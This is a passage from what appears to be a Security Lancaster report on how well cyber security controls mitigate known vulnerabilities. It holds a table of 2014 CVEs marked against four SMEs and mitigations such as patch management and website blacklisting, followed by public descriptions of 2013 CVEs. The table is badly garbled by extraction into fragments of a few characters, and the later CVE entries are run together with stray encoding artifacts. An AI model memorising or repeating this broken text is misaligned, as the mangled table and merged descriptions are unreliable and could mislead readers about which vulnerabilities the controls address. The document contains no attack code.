
emen

tC

VE

-20

14

-34

89

nn

nn

nN

ot

Mit

igat

edM

itig

ated

-S

tro

ng

Pas

swor

ds

(Use

rA

cces

s)C

VE

-20

14

-35

07

nn

yy

yN

ot

Mit

igat

edM

itig

ated

-F

irew

all

ampP

atch

Man

agem

ent

CV

E-2

01

4-3

55

6y

ny

ny

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

CV

E-2

01

4-3

58

0y

yy

nn

No

tM

itig

ated

Mit

igat

ed-

Fir

ewal

lA

nti

DO

S

Pat

chM

anag

emen

tC

VE

-20

14

-38

14

nn

nn

nN

ot

Mit

igat

edM

itig

ated

-S

tro

ng

Pas

swor

ds

(Use

rA

cces

s)C

VE

-20

14

-38

19

nn

nn

nN

ot

Mit

igat

edM

itig

ated

-F

irew

all

An

ti-D

os

Fir

mw

are

Up

dat

esC

VE

-20

14

-38

72

nn

nn

nN

ot

Mit

igat

edM

itig

ated

-S

ecu

reC

on

fig

ura

tio

namp

Pat

chM

anag

emen

tC

VE

-20

14

-40

44

nn

nn

nN

ot

Mit

igat

edP

arti

ally

Mit

igat

ed-

Pat

chM

anag

emen

tC

VE

-20

14

-40

79

yn

yy

nN

ot

Mit

igat

edM

itig

ated

-W

ebsi

teB

lack

listi

ng

S

ecu

reC

on

fig

ura

tio

n(S

ecu

reB

row

ser)

P

atch

Man

agem

ent

CV

E-2

01

4-4

08

2y

ny

yn

No

tM

itig

ated

Mit

igat

ed-

Web

site

Bla

cklis

tin

g

Sec

ure

Co

nfi

gu

rati

on

(Sec

ure

Bro

wse

r)

Pat

chM

anag

emen

tC

VE

-20

14

-41

00

yn

yy

nN

ot

Mit

igat

edM

itig

ated

-W

ebsi

teB

lack

listi

ng

S

ecu

reC

on

fig

ura

tio

n(S

ecu

reB

row

ser)

P

atch

Man

agem

ent

CV

E-2

01

4-4

10

5y

ny

yn

No

tM

itig

ated

Mit

igat

ed-

Web

site

Bla

cklis

tin

g

Sec

ure

Co

nfi

gu

rati

on

(Sec

ure

Bro

wse

r)

Pat

chM

anag

emen

tC

VE

-20

14

-41

14

yy

yy

nN

ot

Mit

igat

edM

itig

ated

-A

nti

-Mal

war

eC

VE

-20

14

-41

27

yn

yy

nN

ot

Mit

igat

edM

itig

ated

-W

ebsi

teB

lack

listi

ng

S

ecu

reC

on

fig

ura

tio

n(S

ecu

reB

row

ser)

P

atch

Man

agem

ent

CV

E-2

01

4-4

13

0y

ny

yn

No

tM

itig

ated

Mit

igat

ed-

Web

site

Bla

cklis

tin

g

Sec

ure

Co

nfi

gu

rati

on

(Sec

ure

Bro

wse

r)

Pat

chM

anag

emen

tC

VE

-20

14

-41

32

yn

yy

nN

ot

Mit

igat

edM

itig

ated

-W

ebsi

teB

lack

listi

ng

S

ecu

reC

on

fig

ura

tio

n(S

ecu

reB

row

ser)

P

atch

Man

agem

ent

CV

E-2

01

4-4

13

3y

ny

yn

No

tM

itig

ated

Mit

igat

ed-

Web

site

Bla

cklis

tin

g

Sec

ure

Co

nfi

gu

rati

on

(Sec

ure

Bro

wse

r)

Pat

chM

anag

emen

t

CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 17 of 28

CV

ES

ME

1S

ME

2S

ME

3S

ME

4Id

ealis

edN

oC

EW

ith

CE

CV

E-2

01

4-4

14

1y

ny

yn

No

tM

itig

ated

Mit

igat

ed-

Web

site

Bla

cklis

tin

g

Sec

ure

Co

nfi

gu

rati

on

(Sec

ure

Bro

wse

r)

Pat

chM

anag

emen

tC

VE

-20

14

-44

81

yy

yy

yN

ot

Mit

igat

edM

itig

ated

-P

atch

Man

agem

ent

An

ti-M

alw

are

CV

E-2

01

4-4

61

7y

yn

nn

No

tM

itig

ated

Mit

igat

ed-

Fir

ewal

lP

atch

Man

agem

ent

CV

E-2

01

4-4

63

1n

nn

nn

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

Sec

ure

Co

nfi

gu

rati

on

CV

E-2

01

4-6

04

0n

nn

nn

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

CV

E-2

01

4-6

10

5n

nn

nn

No

tM

itig

ated

Mit

igat

ed-

Fir

ewal

lP

atch

Man

agem

ent

CV

E-2

01

4-6

13

6n

nn

nn

No

tM

itig

ated

Mit

igat

ed-

Sec

ure

Co

nfi

gu

rati

on

P

atch

Man

agem

ent

CV

E-2

01

4-6

36

3y

ny

yn

No

tM

itig

ated

Mit

igat

ed-

Web

site

Bla

cklis

tin

g

Sec

ure

Co

nfi

gu

rati

on

(Sec

ure

Bro

wse

r)

Pat

chM

anag

emen

tC

VE

-20

14

-63

69

yn

yy

No

tM

itig

ated

Mit

igat

ed-

Web

site

Bla

cklis

tin

g

Sec

ure

Co

nfi

gu

rati

on

(Sec

ure

Bro

wse

r)

Pat

chM

anag

emen

tC

VE

-20

14

-63

78

nn

nn

nn

No

tM

itig

ated

Mit

igat

ed-

Fir

ewal

lP

atch

Man

agem

ent

CV

E-2

01

4-6

48

7n

ny

nn

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

CV

E-2

01

4-7

25

0n

yy

nn

No

tM

itig

ated

Mit

igat

ed-

Fir

ewal

lP

atch

Man

agem

ent

CV

E-2

01

4-7

92

7y

yy

yn

No

tM

itig

ated

Mit

igat

ed-

Fir

ewal

lS

ecu

reC

on

fig

ura

tio

n(A

cces

sC

on

tro

l)

Pat

chM

anag

emen

tC

VE

-20

14

-79

45

yy

yy

nN

ot

Mit

igat

edP

arti

ally

Mit

igat

ed-

Pat

chM

anag

emen

tC

VE

-20

14

-84

47

yy

yy

nN

ot

Mit

igat

edP

arti

ally

Mit

igat

ed-

An

ti-M

alw

are

Pat

chM

anag

emen

tC

VE

-20

14

-86

38

yy

yy

yN

ot

Mit

igat

edM

itig

ated

-W

ebsi

teB

lack

listi

ng

S

ecu

reC

on

fig

ura

tio

n(S

ecu

reB

row

ser)

P

atch

Man

agem

ent

CV

E-2

01

4-8

83

5y

yy

yy

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

CV

E-2

01

4-9

15

9y

yy

yy

No

tM

itig

ated

Par

tial

lyM

itig

ated

-A

nti

-Mal

war

eP

atch

Man

agem

ent

[Tim

eD

elay

]C

VE

-20

14

-91

63

yy

yy

yN

ot

Mit

igat

edP

arti

ally

Mit

igat

ed-

An

ti-M

alw

are

Pat

chM

anag

emen

t[T

ime

Del

ay]

CV

E-2

01

4-9

35

0y

yy

yn

No

tM

itig

ated

Mit

igat

ed-

Fir

ewal

lA

nti

-Do

sF

irm

war

eU

pd

ates

CV

E-2

01

4-9

35

7n

nn

nn

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

An

ti-M

alw

are

Sec

ure

Co

nfi

gu

rati

on


CVE | Details
--- | ---
CVE-2013-0008 | win32k.sys in the kernel-mode drivers in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT does not properly handle window broadcast messages, which allows local users to gain privileges via a crafted application, aka "Win32k Improper Message Handling Vulnerability".
CVE-2013-0022 | Use-after-free vulnerability in Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer LsGetTrailInfo Use After Free Vulnerability".
CVE-2013-0084 | Directory traversal vulnerability in Microsoft SharePoint Server 2010 SP1 and SharePoint Foundation 2010 SP1 allows remote attackers to bypass intended read restrictions for content and hijack user accounts via a crafted URL, aka "SharePoint Directory Traversal Vulnerability".
CVE-2013-0140 | SQL injection vulnerability in the Agent-Handler component in McAfee ePolicy Orchestrator (ePO) before 4.5.7 and 4.6.x before 4.6.6 allows remote attackers to execute arbitrary SQL commands via a crafted request over the Agent-Server communication channel.
CVE-2013-0149 | The OSPF implementation in Cisco IOS 12.0 through 12.4 and 15.0 through 15.3, IOS-XE 2.x through 3.9.xS, ASA and PIX 7.x through 9.1, FWSM, NX-OS, and StarOS before 14.0.50488 does not properly validate Link State Advertisement (LSA) type 1 packets before performing operations on the LSA database, which allows remote attackers to cause a denial of service (routing disruption) or obtain sensitive packet information via a (1) unicast or (2) multicast packet, aka Bug IDs CSCug34485, CSCug34469, CSCug39762, CSCug63304, and CSCug39795.
CVE-2013-0172 | Samba 4.0.x before 4.0.1, in certain Active Directory domain-controller configurations, does not properly interpret Access Control Entries that are based on an objectClass, which allows remote authenticated users to bypass intended restrictions on modifying LDAP directory objects by leveraging (1) objectClass access by a user, (2) objectClass access by a group, or (3) write access to an attribute.
CVE-2013-0174 | The external node classifier (ENC) API in Foreman before 1.1 allows remote attackers to obtain the hashed root password via an API request.
CVE-2013-0199 | The default LDAP ACIs in FreeIPA 3.0 before 3.1.2 do not restrict access to the (1) ipaNTTrustAuthIncoming and (2) ipaNTTrustAuthOutgoing attributes, which allow remote attackers to obtain the Cross-Realm Kerberos Trust key via unspecified vectors.
CVE-2013-0253 | The default configuration of Apache Maven 3.0.4, when using Maven Wagon 2.1, disables SSL certificate checks, which allows remote attackers to spoof servers via a man-in-the-middle (MITM) attack.
CVE-2013-0270 | OpenStack Keystone Grizzly before 2013.1, Folsom, and possibly earlier allows remote attackers to cause a denial of service (CPU and memory consumption) via a large HTTP request, as demonstrated by a long tenant name when requesting a token.
CVE-2013-0481 | The console in IBM Sterling B2B Integrator 5.1 and 5.2 and Sterling File Gateway 2.1 and 2.2 allows remote attackers to read stack traces by triggering (1) an error or (2) an exception.
CVE-2013-0598 | Cross-site request forgery (CSRF) vulnerability in the Web Client in IBM Rational ClearQuest 7.1 before 7.1.2.12, 8.0 before 8.0.0.8, and 8.0.1 before 8.0.1.1 allows remote attackers to hijack the authentication of arbitrary users.
CVE-2013-0619 | Adobe Reader and Acrobat 9.x before 9.5.3, 10.x before 10.1.5, and 11.x before 11.0.1 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2012-1530, CVE-2013-0601, CVE-2013-0605, CVE-2013-0616, CVE-2013-0620, and CVE-2013-0623.
CVE-2013-0633 | Buffer overflow in Adobe Flash Player before 10.3.183.51 and 11.x before 11.5.502.149 on Windows and Mac OS X, before 10.3.183.51 and 11.x before 11.2.202.262 on Linux, before 11.1.111.32 on Android 2.x and 3.x, and before 11.1.115.37 on Android 4.x allows remote attackers to execute arbitrary code via crafted SWF content, as exploited in the wild in February 2013.
CVE-2013-0649 | Use-after-free vulnerability in Adobe Flash Player before 10.3.183.63 and 11.x before 11.6.602.168 on Windows, before 10.3.183.61 and 11.x before 11.6.602.167 on Mac OS X, before 10.3.183.61 and 11.x before 11.2.202.270 on Linux, before 11.1.111.43 on Android 2.x and 3.x, and before 11.1.115.47 on Android 4.x; Adobe AIR before 3.6.0.597; and Adobe AIR SDK before 3.6.0.599 allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2013-0644 and CVE-2013-1374.
CVE-2013-0746 | Mozilla Firefox before 18.0, Firefox ESR 10.x before 10.0.12 and 17.x before 17.0.2, Thunderbird before 17.0.2, Thunderbird ESR 10.x before 10.0.12 and 17.x before 17.0.2, and SeaMonkey before 2.15 do not properly implement quickstubs that use the jsval data type for their return values, which allows remote attackers to execute arbitrary code or cause a denial of service (compartment mismatch and application crash) via crafted JavaScript code that is not properly handled during garbage collection.
CVE-2013-0753 | Use-after-free vulnerability in the serializeToStream implementation in the XMLSerializer component in Mozilla Firefox before 18.0, Firefox ESR 10.x before 10.0.12 and 17.x before 17.0.2, Thunderbird before 17.0.2, Thunderbird ESR 10.x before 10.0.12 and 17.x before 17.0.2, and SeaMonkey before 2.15 allows remote attackers to execute arbitrary code via crafted web content.
CVE-2013-0787 | Use-after-free vulnerability in the nsEditor::IsPreformatted function in editor/libeditor/base/nsEditor.cpp in Mozilla Firefox before 19.0.2, Firefox ESR 17.x before 17.0.4, Thunderbird before 17.0.4, Thunderbird ESR 17.x before 17.0.4, and SeaMonkey before 2.16.1 allows remote attackers to execute arbitrary code via vectors involving an execCommand call.
CVE-2013-0909 | The XSS Auditor in Google Chrome before 25.0.1364.152 allows remote attackers to obtain sensitive HTTP Referer information via unspecified vectors.
CVE-2013-1035 | The iTunes ActiveX control in Apple iTunes before 11.1 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site.
CVE-2013-1102 | The Wireless Intrusion Prevention System (wIPS) component on Cisco Wireless LAN Controller (WLC) devices with software 7.0 before 7.0.235.0, 7.1, 7.2 before 7.2.110.0, and 7.3 before 7.3.101.0 allows remote attackers to cause a denial of service (device reload) via crafted IP packets, aka Bug ID CSCtx80743.
CVE-2013-1140 | The XML parser in Cisco Security Monitoring, Analysis, and Response System (MARS) allows remote attackers to read arbitrary files via an external entity declaration in conjunction with an entity reference, related to an XML External Entity (XXE) issue, aka Bug ID CSCue55093.
CVE-2013-1144 | Memory leak in the IKEv1 implementation in Cisco IOS 15.1 allows remote attackers to cause a denial of service (memory consumption) via unspecified (1) IPv4 or (2) IPv6 IKE packets, aka Bug ID CSCth81055.
CVE-2013-1153 | Cross-site request forgery (CSRF) vulnerability in the web interface in Cisco Prime Infrastructure allows remote attackers to hijack the authentication of arbitrary users, aka Bug ID CSCue84676.
CVE-2013-1181 | Cisco NX-OS on Nexus 5500 devices 4.x and 5.x before 5.0(3)N2(2), Nexus 3000 devices 5.x before 5.0(3)U3(2), and Unified Computing System (UCS) 6200 devices before 2.0(1w) allows remote attackers to cause a denial of service (device reload) by sending a jumbo packet to the management interface, aka Bug IDs CSCtx17544, CSCts10593, and CSCtx95389.
CVE-2013-1303 | Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer Use After Free Vulnerability", a different vulnerability than CVE-2013-1304 and CVE-2013-1338.
CVE-2013-1384 | Adobe Shockwave Player before 12.0.2.122 allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2013-1386.
CVE-2013-1388 | Unspecified vulnerability in Adobe ColdFusion 9.0 before Update 10, 9.0.1 before Update 9, 9.0.2 before Update 4, and 10 before Update 9 allows attackers to obtain administrator-console access via unknown vectors.
CVE-2013-1450 | Microsoft Internet Explorer 8 and 9, when the Proxy Settings configuration has the same Proxy address and Port values in the HTTP and Secure rows, does not properly reuse TCP sessions to the proxy server, which allows remote attackers to obtain sensitive information intended for a specific host via a crafted HTML document that triggers many HTTPS requests and then triggers an HTTP request to that host, as demonstrated by reading a Cookie header, aka MSRC 12096gd.
CVE-2013-1472 | Unspecified vulnerability in the JavaFX component in Oracle Java SE JavaFX 2.2.4 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than other CVEs listed in the February 2013 CPU.
CVE-2013-1553 | Unspecified vulnerability in the Oracle Web Services Manager component in Oracle Fusion Middleware 11.1.1.6.0 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Web Services Security.
CVE-2013-1620 | The TLS implementation in Mozilla Network Security Services (NSS) does not properly consider timing side-channel attacks on a noncompliant MAC check operation during the processing of malformed CBC padding, which allows remote attackers to conduct distinguishing attacks and plaintext-recovery attacks via statistical analysis of timing data for crafted packets, a related issue to CVE-2013-0169.
CVE-2013-1627 | Absolute path traversal vulnerability in NTWebServer.exe in Indusoft Studio 7.0 and earlier and Advantech Studio 7.0 and earlier allows remote attackers to read arbitrary files via a full pathname in an argument to the sub_401A90 CreateFileW function.
CVE-2013-1638 | Opera before 12.13 allows remote attackers to execute arbitrary code via crafted clipPaths in an SVG document.
CVE-2013-1669 | Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 21.0 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
CVE-2013-1676 | The SelectionIterator::GetNextSegment function in Mozilla Firefox before 21.0, Firefox ESR 17.x before 17.0.6, Thunderbird before 17.0.6, and Thunderbird ESR 17.x before 17.0.6 allows remote attackers to execute arbitrary code or cause a denial of service (out-of-bounds read) via unspecified vectors.
CVE-2013-1700 | The Mozilla Maintenance Service in Mozilla Firefox before 22.0 on Windows does not properly handle inability to launch the Mozilla Updater executable file, which allows local users to gain privileges via vectors involving placement of a Trojan horse executable file at an arbitrary location.
CVE-2013-1734 | Cross-site request forgery (CSRF) vulnerability in attachment.cgi in Bugzilla 2.x, 3.x, and 4.0.x before 4.0.11; 4.1.x and 4.2.x before 4.2.7; and 4.3.x and 4.4.x before 4.4.1 allows remote attackers to hijack the authentication of arbitrary users for requests that commit an attachment change via an update action.
CVE-2013-1777 | The JMX Remoting functionality in Apache Geronimo 3.x before 3.0.1, as used in IBM WebSphere Application Server (WAS) Community Edition 3.0.0.3 and other products, does not properly implement the RMI classloader, which allows remote attackers to execute arbitrary code by using the JMX connector to send a crafted serialized object.
CVE-2013-2319 | FileMaker Pro before 12 and Pro Advanced before 12 does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.
CVE-2013-2340 | Unspecified vulnerability on the HP ProCurve JCA, JCB, JDA, JDB, JEA, JFA, JFB, JFC, JGA, 658250-B21, and 658247-B21; HP 3COM routers and switches; and HP H3C routers and switches allows remote attackers to execute arbitrary code or obtain sensitive information via unknown vectors.
CVE-2013-2350 | Unspecified vulnerability in HP Storage Data Protector 6.2X allows remote attackers to execute arbitrary code or cause a denial of service via unknown vectors, aka ZDI-CAN-1897.
CVE-2013-2492 | Stack-based buffer overflow in Firebird 2.1.3 through 2.1.5 before 18514, and 2.5.1 through 2.5.3 before 26623, on Windows allows remote attackers to execute arbitrary code via a crafted packet to TCP port 3050, related to a missing size check during extraction of a group number from CNCT information.
CVE-2013-2507 | Multiple cross-site scripting (XSS) vulnerabilities in the Brother MFC-9970CDW printer with firmware G (1.03) allow remote attackers to inject arbitrary web script or HTML via the (1) id parameter to admin/log_to_net.html or (2) kind parameter to fax/copy_settings.html, a different vulnerability than CVE-2013-2670 and CVE-2013-2671.
CVE-2013-2736 | Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and 11.x before 11.0.03 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2013-2718, CVE-2013-2719, CVE-2013-2720, CVE-2013-2721, CVE-2013-2722, CVE-2013-2723, CVE-2013-2725, CVE-2013-2726, CVE-2013-2731, CVE-2013-2732, CVE-2013-2734, CVE-2013-2735, CVE-2013-3337, CVE-2013-3338, CVE-2013-3339, CVE-2013-3340, and CVE-2013-3341.
CVE-2013-2780 | Siemens SIMATIC S7-1200 PLCs 2.x and 3.x allow remote attackers to cause a denial of service (defect-mode transition and control outage) via crafted packets to UDP port 161 (aka the SNMP port).
CVE-2013-2803 | ProSoft RadioLinx ControlScape before 6.00.040 uses a deficient PRNG algorithm and seeding strategy for passphrases, which makes it easier for remote attackers to obtain access via a brute-force attack.
CVE-2013-2824 | Schneider Electric StruxureWare SCADA Expert Vijeo Citect 7.40, Vijeo Citect 7.20 through 7.30SP1, CitectSCADA 7.20 through 7.30SP1, StruxureWare PowerSCADA Expert 7.30 through 7.30SR1, and PowerLogic SCADA 7.20 through 7.20SR1 do not properly handle exceptions, which allows remote attackers to cause a denial of service via a crafted packet.
CVE-2013-2826 | WellinTech KingSCADA before 3.1.2, KingAlarm&Event before 3.1, and KingGraphic before 3.1.2 perform authentication on the KAEClientManager console rather than on the server, which allows remote attackers to bypass intended access restrictions and discover credentials via a crafted packet to TCP port 8130.
CVE-2013-2920 | The DoResolveRelativeHost function in url/url_canon_relative.cc in Google Chrome before 30.0.1599.66 allows remote attackers to cause a denial of service (out-of-bounds read) via a relative URL containing a hostname, as demonstrated by a protocol-relative URL beginning with a www.google.com substring.
CVE-2013-3064 | Open redirect vulnerability in ui/dynamic/unsecured.html in Linksys EA6500 with firmware 1.1.28.147876 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the target parameter.
CVE-2013-3116 | Microsoft Internet Explorer 7 through 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".
CVE-2013-3137 | Microsoft FrontPage 2003 SP3 does not properly parse DTDs, which allows remote attackers to obtain sensitive information via crafted XML data in a FrontPage document, aka "XML Disclosure Vulnerability".
CVE-2013-3194 | Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".
CVE-2013-3199 | Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".
CVE-2013-3201 | Microsoft Internet Explorer 9 and 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2013-3203, CVE-2013-3206, CVE-2013-3207, and CVE-2013-3209.
CVE-2013-3206 | Microsoft Internet Explorer 9 and 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2013-3201, CVE-2013-3203, CVE-2013-3207, and CVE-2013-3209.
CVE-2013-3280 | EMC RSA Authentication Agent 7.1.x before 7.1.2 for Web for Internet Information Services has a fail-open design, which allows remote attackers to bypass intended access restrictions via vectors that trigger an agent crash.
CVE-2013-3387 | Cisco Prime Central for Hosted Collaboration Solution (HCS) Assurance 8.6 and 9.x before 9.2(1) allows remote attackers to cause a denial of service (disk consumption) via a flood of TCP packets to port 5400, leading to large error-log files, aka Bug ID CSCua42724.
CVE-2013-3417 | The administrative web interface in Cisco Video Surveillance Operations Manager does not properly perform authentication, which allows remote attackers to watch video feeds via a crafted URL, aka Bug ID CSCtg72262.
CVE-2013-3632 | The Cron service in rpc.php in OpenMediaVault allows remote authenticated users to execute cron jobs as arbitrary users and execute arbitrary commands via the username parameter.
CVE-2013-3656 | Cybozu Office 9.1.0 and earlier does not properly manage sessions, which allows remote attackers to bypass authentication by leveraging knowledge of a login URL.
CVE-2013-3856 | Microsoft Word 2003 SP3 and Word Viewer allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted Office document, aka "Word Memory Corruption Vulnerability".
CVE-2013-3860 | Microsoft .NET Framework 2.0 SP2, 3.5, 3.5 SP1, 3.5.1, 4, and 4.5 does not properly parse a DTD during XML digital-signature validation, which allows remote attackers to cause a denial of service (application crash or hang) via a crafted signed XML document, aka "Entity Expansion Vulnerability".
CVE-2013-3893 | Use-after-free vulnerability in the SetMouseCapture implementation in mshtml.dll in Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code via crafted JavaScript strings, as demonstrated by use of an ms-help: URL that triggers loading of hxds.dll.
CVE-2013-3897 | Use-after-free vulnerability in the CDisplayPointer class in mshtml.dll in Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted JavaScript code that uses the onpropertychange event handler, as exploited in the wild in September and October 2013, aka "Internet Explorer Memory Corruption Vulnerability".
CVE-2013-3900 | The WinVerifyTrust function in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 does not properly validate PE file digests during Authenticode signature verification, which allows remote attackers to execute arbitrary code via a crafted PE file, aka "WinVerifyTrust Signature Validation Vulnerability".
CVE-2013-3905 | Microsoft Outlook 2007 SP3, 2010 SP1 and SP2, 2013, and 2013 RT does not properly expand metadata contained in S/MIME certificates, which allows remote attackers to obtain sensitive network configuration and state information via a crafted certificate in an e-mail message, aka "S/MIME AIA Vulnerability".
CVE-2013-4223 | The Gentoo Nullmailer package before 1.11-r2 uses world-readable permissions for /etc/nullmailer/remotes, which allows local users to obtain SMTP authentication credentials by reading the file.
CVE-2013-4436 | The default configuration for salt-ssh in Salt (aka SaltStack) 0.17.0 does not validate the SSH host key of requests, which allows remote attackers to have unspecified impact via a man-in-the-middle (MITM) attack.
CVE-2013-4478 | Sup before 0.13.2.1 and 0.14.x before 0.14.1.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the filename of an email attachment.
CVE-2013-4529 | Buffer overflow in hw/pci/pcie_aer.c in QEMU before 1.7.2 allows remote attackers to cause a denial of service and possibly execute arbitrary code via a large log_num value in a savevm image.

CVE-2013-4555Cross-site request forgery(CSRF) vulnerability in x000Decrireactionlogoutphp in SPIP before2124 allows remote attackers x000D tohijack the authentication of arbitrary usersfor requests that x000D logout the uservia unspecified vectors

CVE-2013-4776NETGEAR ProSafe GS724Tv3 andGS716Tv2 with firmware 54113and x000D earlier GS748Tv454114 and GS510TP 5044 allowsremote x000D attackers to cause adenial of service (reboot or crash) viaa crafted x000D HTTP request tofilesystem

CVE-2013-4782

CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 21 of 28

The Supermicro BMC implementationallows remote attackers to bypass x000Dauthentication and execute arbitrary IPMIcommands by using cipher x000D suite 0(aka cipher zero) and an arbitrary password

CVE-2013-5057rdquohxdsdll in Microsoft Office 2007 SP3 and2010 SP1 and SP2 does not implementthe ASLR protection mechanism whichmakes it easier for remote attackers toexecute arbitrary code via a crafted COMcomponent on a web site that is visitedwith Internet Explorer as exploited in thewild in December 2013 aka rdquordquoHXDS ASLRVulnerabilityrdquordquordquo

CVE-2013-5369IBM SPSS Analytical Decision Management61 before IF1 62 before x000D IF1 and70 before FP1 IF6 might allow remoteattackers to execute x000D arbitrary codeby deploying and accessing a service

CVE-2013-5428IBM WebSphere DataPower XC10appliances 250 do not require x000Dauthentication for all administrative actionswhich allows remote x000D attackers tocause a denial of service via unspecifiedvectors

CVE-2013-5431Open redirect vulnerability in IBM TivoliFederated Identity Manager x000D(TFIM) 611 before IF 15 620 beforeIF 14 621 and 622 before x000D IF8 and Tivoli Federated Identity ManagerBusiness Gateway (TFIMBG) x000D 611before IF 15 620 before IF 14 621 and622 before IF 8 x000D allows remoteattackers to redirect users to arbitrary websites and x000D conduct phishing attacksvia unspecified vectors

CVE-2013-5494Cross-site request forgery (CSRF)vulnerability in the web framework x000Din Cisco Unified MeetingPlace Solution asused in Unified x000D MeetingPlace WebConferencing and Unified MeetingPlaceallows remote x000D attackers to hijackthe authentication of arbitrary usersaka Bug IDs x000D CSCui45209 andCSCui44674

CVE-2013-5507The IPsec implementation in Cisco AdaptiveSecurity Appliance (ASA) x000D Software91 before 91(17) when an IPsec VPNtunnel is enabled x000D allows remoteattackers to cause a denial of service (devicereload) x000D via a (1) ICMP or (2)ICMPv6 packet that is improperly handledduring x000D decryption aka Bug IDCSCue18975

CVE-2013-5536Cisco Secure Access Control System (ACS)does not properly implement x000D anincoming-packet firewall rule which allowsremote attackers to x000D cause a denialof service (process crash) via a floodof crafted x000D packets aka Bug IDCSCui51521

CVE-2013-5559Buffer overflow in the Active TemplateLibrary (ATL) framework in the x000DVPNAPI COM module in Cisco AnyConnectSecure Mobility Client 2x x000D allowsuser-assisted remote attackers to executearbitrary code via a x000D crafted HTMLdocument aka Bug ID CSCuj58139

CVE-2013-5561The Safe Search enforcement feature inCisco Adaptive Security x000D Appliance(ASA) CX Context-Aware SecuritySoftware does not properly x000D performfiltering which allows remote attackers tobypass intended x000D policy restrictionsvia unspecified vectors aka Bug IDCSCui94622

CVE-2013-5751Directory traversal vulnerability in SAPNetWeaver 7x allows remote x000Dattackers to read arbitrary files viaunspecified vectors

CVE-2013-5757Absolute path traversal vulnerability inYealink VoIP Phone SIP-T38G allowsremote authenticated users to readarbitrary files via a full pathname in thedumpConfigFile function in the commandparameter to cgi-bincgiServerexx

CVE-2013-5828Unspecified vulnerability in the EnterpriseManager Base Platform x000D componentin Oracle Enterprise Manager Grid ControlEM Base Platform x000D 10205 and11101 EM DB Control 11107 11202and 11203 x000D and EM Pluginfor DB 12102 and 12103 allowsremote attackers to x000D affect integrityvia unknown vectors related to StorageManagement

CVE-2013-6167Mozilla Firefox through 27 sends HTTPCookie headers without first x000Dvalidating that they have the requiredcharacter-set restrictions x000D whichallows remote attackers to conduct theequivalent of a x000D persistent LogoutCSRF attack via a crafted parameterthat forces a x000D web application toset a malformed cookie within an HTTPresponse

CVE-2013-6188Cross-site request forgery (CSRF)vulnerability in HP System x000DManagement Homepage (SMH) 71through 722 allows remote attackersto x000D hijack the authentication ofunspecified victims via unknown vectors

CVE-2013-6284rdquoUnspecified vulnerability in the StatutoryReporting for Insurance x000D (FS SR)component in the Financial Servicesmodule for SAP ERP Central x000DComponent (ECC) allows attackersto execute arbitrary code via x000Dunspecified vectors related to a rdquordquocodeinjection vulnerabilityrdquordquordquo

CVE-2013-6396The OpenStack Python client libraryfor Swift (python-swiftclient) 10 x000Dthrough 190 does not verify X509certificates from SSL servers x000D whichallows man-in-the-middle attackers tospoof servers and obtain x000D sensitiveinformation via a crafted certificate

CVE-2013-6475Multiple integer overflows in (1)OPVPOutputDevcxx and (2) x000DoprsOPVPSplashcxx in the pdftoopvpfilter in CUPS and cups-filters x000Dbefore 1047 allow remote attackers toexecute arbitrary code via a x000D craftedPDF file which triggers a heap-based bufferoverflow

CVE-2013-6660The drag-and-drop implementation inGoogle Chrome before 3301750117 doesnot properly restrict the information inWebDropData data structures which allowsremote attackers to discover full pathnamesvia a crafted web site

